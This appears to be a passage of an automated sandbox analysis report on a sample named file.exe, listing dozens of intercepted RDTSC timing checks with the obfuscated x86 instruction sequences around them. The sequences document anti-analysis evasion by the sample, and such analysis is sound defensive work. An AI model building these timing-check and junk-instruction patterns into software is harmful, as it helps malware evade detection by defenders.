                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CC7F second address: E9CC94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FBBA93ED298h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE6D second address: E9CE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FBBA8502ABFh 0x0000000f jmp 00007FBBA8502ABDh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CE98 second address: E9CE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CFF5 second address: E9CFFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9CFFF second address: E7BEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b movzx edx, bx 0x0000000e mov dword ptr [ebp+122D1A79h], esi 0x00000014 lea eax, dword ptr [ebp+1247FA56h] 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FBBA93ED298h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D2FE4h], eax 0x0000003a jnp 00007FBBA93ED299h 0x00000040 mov di, dx 0x00000043 push eax 0x00000044 jmp 00007FBBA93ED29Bh 0x00000049 mov dword ptr [esp], eax 0x0000004c push 00000000h 0x0000004e push ecx 0x0000004f call 00007FBBA93ED298h 0x00000054 pop ecx 0x00000055 mov dword ptr [esp+04h], ecx 0x00000059 add dword ptr [esp+04h], 0000001Ch 0x00000061 inc ecx 0x00000062 push ecx 0x00000063 ret 0x00000064 pop ecx 0x00000065 ret 0x00000066 mov edx, 0198D52Dh 0x0000006b jnp 00007FBBA93ED299h 0x00000071 movsx edx, si 0x00000074 mov edx, 4498BF36h 0x00000079 call dword ptr [ebp+12449B9Bh] 0x0000007f pushad 0x00000080 jmp 00007FBBA93ED2A9h 0x00000085 push eax 0x00000086 push edx 0x00000087 ja 00007FBBA93ED296h 0x0000008d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE25C second address: EDE264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE264 second address: EDE26A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE66F second address: EDE673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDE673 second address: EDE6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBBA93ED29Dh 0x0000000d push esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FBBA93ED2A8h 0x00000018 push eax 0x00000019 pop eax 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDEAB6 second address: EDEABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDEC4D second address: EDEC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE19B3 second address: EE19BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE1B0D second address: EE1B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE1B11 second address: EE1B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE454E second address: EE4565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBBA93ED2A3h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4565 second address: EE45A3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007FBBA8502AB6h 0x00000011 jg 00007FBBA8502AB6h 0x00000017 jmp 00007FBBA8502ABEh 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 pushad 0x00000022 jne 00007FBBA8502ABCh 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9159 second address: EE9182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBBA93ED296h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FBBA93ED296h 0x00000012 jmp 00007FBBA93ED2A7h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9182 second address: EE91A2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBA8502AB6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jbe 00007FBBA8502ACAh 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 jg 00007FBBA8502AB6h 0x0000001c pop edi 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9705 second address: EE9722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBBA93ED2A6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC44C second address: EEC450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC450 second address: EEC485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FBBA93ED2A0h 0x0000000e je 00007FBBA93ED296h 0x00000014 pop esi 0x00000015 pushad 0x00000016 jmp 00007FBBA93ED2A2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0EFE second address: EF0F19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 jg 00007FBBA8502AB6h 0x0000000f pop esi 0x00000010 popad 0x00000011 jc 00007FBBA8502AD9h 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF0F19 second address: EF0F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1089 second address: EF108D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1355 second address: EF135B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14A4 second address: EF14B7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007FBBA8502AD4h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14B7 second address: EF14BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14BB second address: EF14C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF14C7 second address: EF14CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C95A second address: E9C971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBBA8502AC0h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF1630 second address: EF1643 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b js 00007FBBA93ED296h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF17C8 second address: EF17CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF17CC second address: EF17D8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBBA93ED296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8513 second address: EF8519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF869A second address: EF869E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF869E second address: EF86A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF86A2 second address: EF86A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8969 second address: EF8973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBBA8502AB6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF8973 second address: EF897B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF897B second address: EF897F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF897F second address: EF89CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBBA93ED296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FBBA93ED2A9h 0x00000014 jmp 00007FBBA93ED29Dh 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007FBBA93ED2A2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF91EC second address: EF91F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF91F5 second address: EF9205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA93ED29Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9205 second address: EF9229 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBBA8502AB6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FBBA8502AB6h 0x00000013 jmp 00007FBBA8502ABFh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF94E5 second address: EF9505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a js 00007FBBA93ED296h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9505 second address: EF952A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 jl 00007FBBA8502ABEh 0x0000000d jnc 00007FBBA8502AB6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBBA8502ABDh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF9AAD second address: EF9AC9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBBA93ED298h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBBA93ED29Bh 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFA05B second address: EFA077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFA077 second address: EFA07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFEB38 second address: EFEB55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FBBA8502AC3h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01C7E second address: F01C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01C84 second address: F01CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502AC3h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F01E4F second address: F01E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0268B second address: F02696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F02696 second address: F0269C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F027E3 second address: F027ED instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBBA8502AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F027ED second address: F02815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBBA93ED29Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 ja 00007FBBA93ED298h 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A1AE second address: F0A1D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FBBA8502AB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBBA8502AC9h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A819 second address: F0A81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A81F second address: F0A82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBBA8502AB8h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AF8A second address: F0AF9B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBBA93ED296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AF9B second address: F0AFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBBA8502AC4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFB8 second address: F0AFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFBC second address: F0AFC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFC0 second address: F0AFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBBA93ED296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push esi 0x0000000f jmp 00007FBBA93ED29Ch 0x00000014 pop esi 0x00000015 push esi 0x00000016 pushad 0x00000017 popad 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop esi 0x0000001b push eax 0x0000001c ja 00007FBBA93ED296h 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jbe 00007FBBA93ED296h 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AFF2 second address: F0AFF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B14E second address: F0B152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B152 second address: F0B158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C02C second address: F0C044 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBBA93ED296h 0x00000008 jno 00007FBBA93ED296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007FBBA93ED2A2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E54A second address: F0E54E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E54E second address: F0E55A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E55A second address: F0E55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E55E second address: F0E574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FBBA93ED296h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E574 second address: F0E57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0E57A second address: F0E57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0FCB0 second address: F0FCB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F14849 second address: F1484E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F226B3 second address: F226BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBBA8502AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25061 second address: F25065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BA3 second address: F26BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BA7 second address: F26BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FBBA93ED2A6h 0x0000000c pop ebx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BC5 second address: F26BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBBA8502AB6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BD1 second address: F26BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26BD5 second address: F26BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBBA8502ABAh 0x0000000d jmp 00007FBBA8502ABAh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2EB2E second address: F2EB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FBBA93ED296h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2EB3D second address: F2EB4D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FBBA8502AB8h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30E57 second address: F30E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FBBA93ED2A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30E6E second address: F30E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FBBA8502AB8h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39382 second address: F39386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39386 second address: F393B0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBBA8502AB6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007FBBA8502ACBh 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007FBBA8502AC3h 0x0000001c rdtsc
